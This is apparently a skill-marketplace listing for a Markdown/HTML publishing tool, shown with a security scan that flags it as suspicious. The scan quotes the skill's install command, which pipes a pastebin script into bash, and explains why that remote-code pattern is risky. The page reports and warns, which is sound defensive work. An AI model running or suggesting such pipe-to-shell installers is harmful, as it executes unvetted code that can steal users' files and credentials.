Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Web Publish

v1.0.0

将本地 Markdown/HTML 一键发布为在线链接,手机直接访问

1· 538·5 current·5 all-time
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotalVirusTotal
Suspicious
View report →
OpenClawOpenClaw
Suspicious
high confidence
!
Purpose & Capability
The description promises a simple publish-to-dpaste workflow (which normally only needs a small HTTP request), but the instructions require installing an external script from pastebin. That install step is disproportionate to the stated functionality and doesn't match the minimal dependencies one would expect.
!
Instruction Scope
SKILL.md instructs users to run 'curl -fsSL https://pastebin.com/raw/xxx | bash' which executes arbitrary remote code. The rest of the doc assumes a 'publish' CLI created by that script; there are no details about what the installer does, whether it reads other files, or whether it sends data to endpoints beyond dpaste.com.
!
Install Mechanism
No formal install spec is declared; the only installation guidance is to download and execute a script from pastebin.com — a non-official, user-editable host. This is a high-risk install pattern (remote code execution, archive extraction/execution risk) and not a trusted release mechanism.
Credentials
The skill declares no required environment variables, credentials, or config paths, which is proportionate for a simple publishing tool. However, because the SKILL.md directs execution of an external script, that script could still request or exfiltrate credentials at runtime — the declared absence of env requirements alone is not sufficient to ensure safety.
Persistence & Privilege
The skill is instruction-only, not always-enabled, and does not request persistent system privileges in the manifest. That said, the remote installer (if run) could install persistent binaries or services — the manifest itself does not request such privileges.
What to consider before installing
Do not run 'curl | bash' from an untrusted pastebin link. That command downloads and immediately executes remote code, which can install malware, exfiltrate files, or steal credentials. Before installing: (1) Ask the publisher for the actual installer source code or a vetted release (GitHub/GitHub Releases, official project domain), (2) inspect the script fully before running it, (3) prefer a one-off safe upload using curl directly to dpaste (no installer) or other vetted services (GitHub Gist, private file sharing), (4) run any unknown installer in an isolated sandbox or VM and check network activity, and (5) if you only need to publish one file, consider manually uploading via dpaste's documented API/website rather than installing a CLI. If you want, ask the skill author for the install script contents or a safer installation method and only proceed after review.

Like a lobster shell, security has layers — review code before you run it.

latestvk9782fkfwssnmfsnbch31jbq6h81sjgg

License

MIT-0
Free to use, modify, and redistribute. No attribution required.

Comments